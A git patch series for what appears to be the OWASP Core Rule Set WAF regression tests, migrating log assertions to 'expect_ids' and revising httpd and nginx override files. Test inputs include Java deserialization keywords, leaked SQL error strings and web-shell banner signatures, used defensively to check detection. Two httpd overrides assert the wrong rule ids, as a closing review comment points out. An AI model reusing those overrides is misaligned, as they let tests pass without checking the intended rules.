log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 328 desc: "Content-Type text/plain includes keyword B3aGlsZWNsb3N1cmU" stages: @@ -6325,7 +6652,8 @@ tests: version: "HTTP/1.0" data: "test=B3aGlsZWNsb3N1cmU" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 329 desc: "Content-Type application/json arg value includes keyword B3aGlsZWNsb3N1cmU" stages: @@ -6344,7 +6672,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"B3aGlsZWNsb3N1cmU\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 330 desc: "Content-Type application/json arg name includes keyword B3aGlsZWNsb3N1cmU" stages: 
@@ -6363,4 +6692,5 @@ tests: version: "HTTP/1.0" data: "{\"B3aGlsZWNsb3N1cmU\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] diff --git a/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml b/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml index 96009a36e..bb4b5cf06 100644 --- a/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml +++ b/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml @@ -22,7 +22,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "949110" + log: + expect_ids: [949110] - test_id: 2 desc: Test is basically identical to 941100-4 (XSS negative test in phase 2) but here we assert that inbound blocking mechanism is not triggered stages: @@ -38,7 +39,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: id "949110" + log: + no_expect_ids: [949110] - test_id: 3 desc: Test is basically identical to 920100-9 (protocol enforcement negative test in phase 1) but here we assert that the inbound blocking mechanism is not triggered stages: @@ -53,7 +55,8 @@ tests: uri: "/options" version: "HTTP/1.1" output: - no_log_contains: "id \"949110\"" + log: + no_expect_ids: [949110] - test_id: 4 desc: Test is basically identical to 920100-10 (protocol enforcement positive test in phase 1) but here we assert that inbound blocking mechanism is triggered stages: @@ -68,7 +71,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"949110\"" + log: + expect_ids: [949110] - test_id: 5 desc: Test is basically identical to 949110-0 (see above) but here we assert that the scores are summed up and reported properly stages: 
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml index 8880834b0..4e4c8ffd5 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml @@ -23,4 +23,5 @@ tests: data: |- {"body":"[match sql-errors.data]the used select statements have different number of columns[/match]: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression"} output: - log_contains: "id \"951110\"" + log: + expect_ids: [951110] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml index 0f6f70f3f..df1498b4e 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml @@ -23,4 +23,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL Error: ORA-00933: SQL command not properly ended"} output: - log_contains: "id \"951120\"" + log: + expect_ids: [951120] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml index 04d9d75a2..2dee3e9fb 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml @@ -23,4 +23,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: DB2 SQL Error: SQLCODE=-104, SQLSTATE=42601, SQLERRMC=DECLARE"} output: - log_contains: "id \"951130\"" + log: + expect_ids: [951130] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml index 2ade0e0ad..1e9af862e 100644 
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml @@ -23,4 +23,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [DM_QUERY_E_SYNTAX]error: \"A Parser Error (syntax error) has occurred in the vicinity of: select * from dm_folder where folder in\""} output: - log_contains: "id \"951140\"" + log: + expect_ids: [951140] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml index de3cb5a23..161aaea10 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml @@ -23,4 +23,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Dynamic SQL Error"} output: - log_contains: "id \"951150\"" + log: + expect_ids: [951150] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml index cfbeb2a88..ea77b7f80 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml @@ -23,4 +23,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL-status: HY000 [FrontBase Inc.][FrontBase ODBC]Semantic error 217. Datatypes are not comparable or don't match. Semantic error 485. Near: SELECT DISTINCT * FROM SALES WHERE DATE>='2014-04-01';. Semantic error 485. Near: '2014-04-01'. Exception 363. Transaction rollback."} output: - log_contains: "id \"951160\"" + log: + expect_ids: [951160] 
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml index cc0faad55..a6ab7eada 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml @@ -23,4 +23,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: at org.hsqldb.jdbc.JDBCDriver.connect(Unknown Source)"} output: - log_contains: "id \"951170\"" + log: + expect_ids: [951170] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml index a9b5c0d5d..ebbb20c6c 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml @@ -23,4 +23,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Exception in thread \"main\" java.sql.SQLException: An illegal character has been found in the statement."} output: - log_contains: "id \"951180\"" + log: + expect_ids: [951180] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml index 21e7d6d8a..24570ba38 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml @@ -23,4 +23,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [5000A] [Actian][Ingres ODBC Driver][Ingres]Delimited identifier starting with '' contains no valid characters. (6692) (SQLExecDirectW)"} output: - log_contains: "id \"951190\"" + log: + expect_ids: [951190] 
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml index ae89d41d8..2a31214ec 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml @@ -23,4 +23,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Unexpected end of command in statement [SELECT * FROM INTO WHERE 'place'='xxxxxxx' AND 'yielddate' BETWEEN '01/11/2012' AND '29/11/2012''']."} output: - log_contains: "id \"951200\"" + log: + expect_ids: [951200] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml index 740acf8f9..554fc98ef 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml @@ -23,4 +23,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: maxdb_query(): -8004 POS(62) Constant must be compatible with column type and length"} output: - log_contains: "id \"951210\"" + log: + expect_ids: [951210] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml index b92a07a32..37d8c78e1 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml 
@@ -23,7 +23,8 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: PHP Warning: mssql_query(): message: Incorrect syntax near 's'. (severity 15) in /Volumes/Data/Users/username/Desktop/createXML.php on line 375"} output: - log_contains: "id \"951220\"" + log: + expect_ids: [951220] - test_id: 2 desc: "Matching mssql SQL Information Leakage" stages: @@ -43,4 +44,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Conversion failed when converting the varchar value 'secret' to data type int."} output: - log_contains: "id \"951220\"" + log: + expect_ids: [951220] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml index 085ff639d..7663c5e82 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml @@ -23,7 +23,8 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1772 (HY000): Malformed GTID set specification 'secret_password'."} output: - log_contains: "id \"951230\"" + log: + expect_ids: [951230] - test_id: 2 desc: "Matching MySQL SQL Information Leakage" stages: @@ -43,4 +44,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1105 (HY000): XPATH syntax error: '\\secret'"} output: - log_contains: "id \"951230\"" + log: + expect_ids: [951230] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml index be9ca63e3..720f5cae0 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml 
@@ -23,7 +23,8 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: pg_query(): supplied argument is not a valid PostgreSQL link resource in /var/www/sivusto/handler.php on line 56"} output: - log_contains: "id \"951240\"" + log: + expect_ids: [951240] - test_id: 2 desc: "Matching PostgreSQL Information Leakage" stages: @@ -43,4 +44,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR: invalid input syntax for integer"} output: - log_contains: "id \"951240\"" + log: + expect_ids: [951240] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml index 473ffacda..321868202 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml @@ -23,4 +23,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: SQLite3::query() [sqlite3.query]: 1 values for 2 columns in /mysite/product.php on line 94"} output: - log_contains: "id \"951250\"" + log: + expect_ids: [951250] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml index c26b567bc..e1e08b2dc 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml @@ -23,4 +23,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: Sybase: Server message: Changed database context to 'rdhiman'. (severity 10, procedure N/A) in guestfatch.php on line 10"} output: - log_contains: "id \"951260\"" + log: + expect_ids: [951260] 
diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml index d3f6492a4..3fdccb669 100644 --- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml +++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml @@ -22,7 +22,8 @@ tests: uri: "/post" data: "Maximum allowed file size is 10 MB" output: - no_log_contains: id "953100" + log: + no_expect_ids: [953100] - test_id: 2 desc: "'Invalid date' Wordpress FP, it should not match at PL1" stages: @@ -41,7 +42,8 @@ tests: uri: "/post" data: "Invalid date selected" output: - no_log_contains: id "953100" + log: + no_expect_ids: [953100] - test_id: 3 desc: "'The function' might lead to FPs, it should not match at PL1" stages: @@ -60,7 +62,8 @@ tests: uri: "/post" data: "please review the function" output: - no_log_contains: id "953100" + log: + no_expect_ids: [953100] - test_id: 4 desc: "'Static function' might lead to FPs, it should not match at PL1" stages: @@ -79,7 +82,8 @@ tests: uri: "/post" data: "This is a static function" output: - no_log_contains: id "953100" + log: + no_expect_ids: [953100] - test_id: 5 desc: "'cannot be empty is too common for PL1 GH isue #3399" stages: @@ -98,4 +102,5 @@ tests: uri: "/post" data: "Field cannot be empty." output: - no_log_contains: id "953100" + log: + no_expect_ids: [953100] diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml index c39660999..698ea42ee 100644 --- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml +++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml @@ -23,7 +23,8 @@ tests: data: |- {"body": "Maximum allowed file size is 10 MB"} output: - log_contains: id "953101" + log: + expect_ids: [953101] - test_id: 2 desc: "'Invalid date' leads to FPs at PL1, it should match at PL2" stages: 
@@ -43,7 +44,8 @@ tests: data: |- {"body": "Invalid date selected"} output: - log_contains: id "953101" + log: + expect_ids: [953101] - test_id: 3 desc: "'The function' might lead to FPs at PL1, it should match at PL2" stages: @@ -63,7 +65,8 @@ tests: data: |- {"body": "Please review the function"} output: - log_contains: id "953101" + log: + expect_ids: [953101] - test_id: 4 desc: "'Static function' might lead to FPs at PL1, it should match at PL2" stages: @@ -83,7 +86,8 @@ tests: data: |- {"body": "This is a static function"} output: - log_contains: id "953101" + log: + expect_ids: [953101] - test_id: 5 desc: "'cannot be empty is too common for PL1, it should match at PL2 GH isue #3399" stages: @@ -103,4 +107,5 @@ tests: data: |- {"body": "cannot be empty."} output: - log_contains: id "953101" + log: + expect_ids: [953101] diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml index 5070e5e5d..4475c5935 100644 --- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml +++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml @@ -22,7 +22,8 @@ tests: uri: "/reflect" data: "{\"body\": \"\"}" output: - log_contains: "id \"953120\"" + log: + expect_ids: [953120] - test_id: 2 desc: "Negative test, returns \"}" output: - log_contains: "id \"953120\"" + log: + expect_ids: [953120] - test_id: 6 desc: "Negative test, returns \"}" output: - log_contains: "id \"953120\"" + log: + expect_ids: [953120] diff --git a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml index 905f7d154..93c7d327a 100644 --- a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml +++ b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml 
@@ -20,4 +20,5 @@ tests: uri: "/reflect" data: "{\"body\": \"C:\\\\inetpub \\n\"}" output: - log_contains: "id \"954100\"" + log: + expect_ids: [954100] diff --git a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml index a9eed253a..71366862c 100644 --- a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml +++ b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml @@ -21,7 +21,8 @@ tests: data: |- {"body": "text=404.14 - URL too long."} output: - log_contains: id "954120" + log: + expect_ids: [954120] - test_id: 2 desc: 'Match IIS error page' stages: @@ -39,4 +40,5 @@ tests: data: |- {"body": "text=500.15 - Server error: Direct requests for GLOBAL.ASA are not allowed."} output: - log_contains: id "954120" + log: + expect_ids: [954120] diff --git a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml index f052a9dfb..7e9c13b50 100644 --- a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml +++ b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml @@ -23,7 +23,8 @@ tests: data: |- {"body": "

.:NCC:. Shell v"} output: - log_contains: "id \"955100\"" + log: + expect_ids: [955100] - test_id: 2 desc: "Matching web shell Simple PHP backdoor" stages: @@ -43,7 +44,8 @@ tests: data: |- {"body": ""} output: - log_contains: "id \"955100\"" + log: + expect_ids: [955100] - test_id: 3 desc: "Matching web shell WinX Shell" stages: @@ -63,4 +65,5 @@ tests: data: |- {"body": "-:[GreenwooD]:- WinX Shell"} output: - log_contains: "id \"955100\"" + log: + expect_ids: [955100] diff --git a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml index 8a95998fd..699a250f3 100644 --- a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml +++ b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml @@ -21,4 +21,5 @@ tests: uri: "/reflect" data: "{\"body\": \"\\n\\nRu24PostWebShell -\"}" output: - log_contains: "id \"955260\"" + log: + expect_ids: [955260] diff --git a/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml b/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml index 9f1457ae6..08d07373a 100644 --- a/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml +++ b/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml @@ -26,7 +26,8 @@ tests: uri: "/reflect" data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}" output: - log_contains: "id \"959100\"" + log: + expect_ids: [959100] - test_id: 2 desc: Test is basically identical to 953120-1 (PHP leakage negative test in phase 4) but here we assert that the outbound blocking mechanism is not triggered stages: @@ -46,7 +47,8 @@ tests: data: |- {"body": "<?php12345"} output: - no_log_contains: "id \"959100\"" + log: + no_expect_ids: [959100] - test_id: 3 desc: Test is basically identical to 959100-1 (see above) but here we assert that the scores are summed up and reported properly stages: 
diff --git a/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml b/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml index 2f454e790..44461a0e3 100644 --- a/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml +++ b/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml @@ -32,7 +32,8 @@ tests: # Retry the test once if it fails to work around this issue. # See https://github.com/coreruleset/go-ftw/issues/141. retry_once: true - log_contains: "id \"980170\"" + log: + expect_ids: [980170] - test_id: 2 desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is logged that scored but was not blocked stages: @@ -52,7 +53,8 @@ tests: # Retry the test once if it fails to work around this issue. # See https://github.com/coreruleset/go-ftw/issues/141. retry_once: true - log_contains: "id \"980170\"" + log: + expect_ids: [980170] - test_id: 3 desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is not logged that did not score stages: @@ -67,8 +69,9 @@ tests: uri: "/get" version: "HTTP/1.1" output: - # Phase 5 rules are prone to a race condition when parsing log output. + # Phase 5 rules are prone to a race condition when parsing log output. # Retry the test once if it fails to work around this issue. # See https://github.com/coreruleset/go-ftw/issues/141. retry_once: true - no_log_contains: "id \"980170\"" + log: + no_expect_ids: [980170] From 0cf921b1fc1d2e547c1db0412a5f054b10ce0ab0 Mon Sep 17 00:00:00 2001 
From: Max Leske <maxleske@gmail.com> Date: Sun, 5 May 2024 21:53:58 +0200 Subject: [PATCH 10/18] chore: clean up overrides --- tests/regression/coraza-overrides.yaml | 1 - tests/regression/httpd-overrides.yaml | 27 ++++- tests/regression/nginx-overrides.yaml | 113 ++++++++++++++---- .../REQUEST-913-SCANNER-DETECTION/913100.yaml | 1 - .../920100.yaml | 4 +- .../920120.yaml | 2 +- .../920171.yaml | 78 ++++++------ .../920270.yaml | 3 - .../920274.yaml | 4 - .../920290.yaml | 9 +- .../920300.yaml | 1 - .../920360.yaml | 1 - .../920430.yaml | 10 +- .../920440.yaml | 1 - .../920480.yaml | 25 ++-- .../920490.yaml | 2 +- .../920540.yaml | 4 +- .../920620.yaml | 9 +- .../REQUEST-921-PROTOCOL-ATTACK/921110.yaml | 1 - .../REQUEST-921-PROTOCOL-ATTACK/921130.yaml | 1 - .../REQUEST-921-PROTOCOL-ATTACK/921180.yaml | 5 +- .../930110.yaml | 6 +- .../930120.yaml | 1 - .../930130.yaml | 1 - .../931100.yaml | 1 - .../931110.yaml | 1 - .../931120.yaml | 1 - .../931130.yaml | 1 - .../931131.yaml | 1 - .../932120.yaml | 1 - .../932125.yaml | 1 - .../932130.yaml | 1 - .../932131.yaml | 1 - .../932160.yaml | 1 - .../932200.yaml | 3 +- .../932236.yaml | 3 +- .../932239.yaml | 3 +- .../932260.yaml | 1 - .../933100.yaml | 1 - .../933110.yaml | 1 - .../933111.yaml | 1 - .../933120.yaml | 4 +- .../933130.yaml | 1 - .../933131.yaml | 1 - .../933140.yaml | 1 - .../933150.yaml | 1 - .../933151.yaml | 1 - .../933160.yaml | 3 +- .../933161.yaml | 1 - .../933170.yaml | 1 - .../933180.yaml | 1 - .../933190.yaml | 1 - .../933200.yaml | 1 - .../934100.yaml | 35 ------ .../934101.yaml | 5 +- .../934130.yaml | 3 +- .../934140.yaml | 1 - .../934150.yaml | 1 - .../934160.yaml | 5 +- .../941100.yaml | 1 - .../941101.yaml | 1 - .../941110.yaml | 1 - .../941120.yaml | 1 - .../941130.yaml | 1 - .../941140.yaml | 1 - .../941150.yaml | 1 - .../941160.yaml | 1 - .../941170.yaml | 1 - .../941180.yaml | 1 - .../941181.yaml | 1 - .../941190.yaml | 1 - .../941200.yaml | 1 - .../941210.yaml | 2 +- .../941230.yaml | 1 
- .../941240.yaml | 1 - .../941250.yaml | 1 - .../941260.yaml | 1 - .../941270.yaml | 1 - .../941280.yaml | 1 - .../941290.yaml | 1 - .../941300.yaml | 1 - .../941320.yaml | 1 - .../941330.yaml | 1 - .../941340.yaml | 1 - .../941350.yaml | 1 - .../941360.yaml | 1 - .../941370.yaml | 1 - .../941380.yaml | 1 - .../941390.yaml | 1 - .../941400.yaml | 1 - .../942120.yaml | 1 - .../942130.yaml | 1 - .../942140.yaml | 1 - .../942160.yaml | 1 - .../942170.yaml | 1 - .../942180.yaml | 1 - .../942190.yaml | 1 - .../942200.yaml | 1 - .../942210.yaml | 2 +- .../942220.yaml | 2 - .../942230.yaml | 1 - .../942240.yaml | 1 - .../942250.yaml | 4 +- .../942251.yaml | 2 +- .../942260.yaml | 2 +- .../942270.yaml | 2 +- .../942280.yaml | 2 +- .../942290.yaml | 2 +- .../942300.yaml | 2 +- .../942310.yaml | 2 +- .../942320.yaml | 2 +- .../942321.yaml | 1 + .../942330.yaml | 2 +- .../942340.yaml | 2 +- .../942350.yaml | 2 +- .../942360.yaml | 2 +- .../942361.yaml | 2 +- .../942362.yaml | 2 +- .../942370.yaml | 3 +- .../942380.yaml | 2 +- .../942390.yaml | 2 +- .../942400.yaml | 2 +- .../942410.yaml | 2 +- .../942420.yaml | 2 +- .../942421.yaml | 2 +- .../942430.yaml | 2 +- .../942431.yaml | 2 +- .../942432.yaml | 2 +- .../942440.yaml | 2 +- .../942450.yaml | 2 +- .../942460.yaml | 2 +- .../942470.yaml | 2 +- .../942480.yaml | 18 +-- .../942490.yaml | 2 +- .../942510.yaml | 2 +- .../942511.yaml | 2 +- .../943100.yaml | 2 +- .../943110.yaml | 2 +- .../943120.yaml | 2 +- .../944130.yaml | 1 - .../944140.yaml | 2 +- .../944150.yaml | 6 +- .../944151.yaml | 4 +- .../944152.yaml | 4 +- .../944210.yaml | 1 - .../944240.yaml | 1 - .../944250.yaml | 1 - .../944260.yaml | 1 - .../944300.yaml | 91 -------------- .../949110.yaml | 3 +- .../951110.yaml | 1 - .../951120.yaml | 1 - .../951130.yaml | 1 - .../951140.yaml | 1 - .../951160.yaml | 1 - .../951170.yaml | 1 - .../951180.yaml | 1 - .../951190.yaml | 1 - .../951200.yaml | 1 - .../951210.yaml | 1 - .../951220.yaml | 1 - .../951230.yaml | 1 - 
.../951240.yaml | 1 - .../951250.yaml | 1 - .../951260.yaml | 1 - .../953100.yaml | 1 - .../953101.yaml | 1 - .../953120.yaml | 1 - .../954100.yaml | 1 - .../954120.yaml | 2 +- .../tests/RESPONSE-955-WEB-SHELLS/955100.yaml | 1 - .../tests/RESPONSE-955-WEB-SHELLS/955260.yaml | 2 +- .../959100.yaml | 3 +- .../RESPONSE-980-CORRELATION/980170.yaml | 4 +- .../tests/positivetest-light.yaml.skeleton | 36 ++++-- .../tests/positivetest.yaml.skeleton | 51 +++++--- 176 files changed, 319 insertions(+), 452 deletions(-) diff --git a/tests/regression/coraza-overrides.yaml b/tests/regression/coraza-overrides.yaml index 9d5a8b7f9..39373d99f 100644 --- a/tests/regression/coraza-overrides.yaml +++ b/tests/regression/coraza-overrides.yaml @@ -43,7 +43,6 @@ test_overrides: output: status: 505 log: - expect_ids: [] no_expect_ids: [920430] - rule_id: 932200 test_ids: [13] diff --git a/tests/regression/httpd-overrides.yaml b/tests/regression/httpd-overrides.yaml index 8f42ffa6e..8e39a7abc 100644 --- a/tests/regression/httpd-overrides.yaml +++ b/tests/regression/httpd-overrides.yaml @@ -5,8 +5,31 @@ meta: annotations: - purpose: "CRS test suite" test_overrides: + - rule_id: 920360 + test_ids: [1] + reason: Requires ARG_NAME_LENGTH to be set to an appropriately low value + output: + status: 200 + log: + no_expect_ids: [920360] + - rule_id: 920370 + test_ids: [1] + reason: Exceeds PCRE limits + output: + status: 200 + log: + no_expect_ids: [920360] + - rule_id: 920380 + test_ids: [1] + reason: Requires MAX_NUM_ARGS to be set to a sufficiently low value + output: + status: 200 + log: + no_expect_ids: [920280] - rule_id: 920390 test_ids: [1] - reason: 'Exceeds PCRE limits' + reason: Exceeds PCRE limits output: - expect_error: true + status: 200 + log: + no_expect_ids: [920390] diff --git a/tests/regression/nginx-overrides.yaml b/tests/regression/nginx-overrides.yaml index cb2cd55c4..1c40df533 100644 --- a/tests/regression/nginx-overrides.yaml +++ b/tests/regression/nginx-overrides.yaml 
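Review bot: The new httpd overrides for 920370 and 920380 assert the absence of the wrong rule ids: the `rule_id: 920370` entry carries `no_expect_ids: [920360]` and the `rule_id: 920380` entry carries `no_expect_ids: [920280]`, so neither override checks the rule it is meant to cover and the test passes even if 920370 or 920380 does fire. They should read `no_expect_ids: [920370]` and `no_expect_ids: [920380]` respectively. Since 920390 also changes from `expect_error: true` to a clean 200 with a negative log assertion, it is worth stating in each `reason` that the rule is known not to fire on this platform, so these entries read as documented detection gaps rather than as passing tests.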
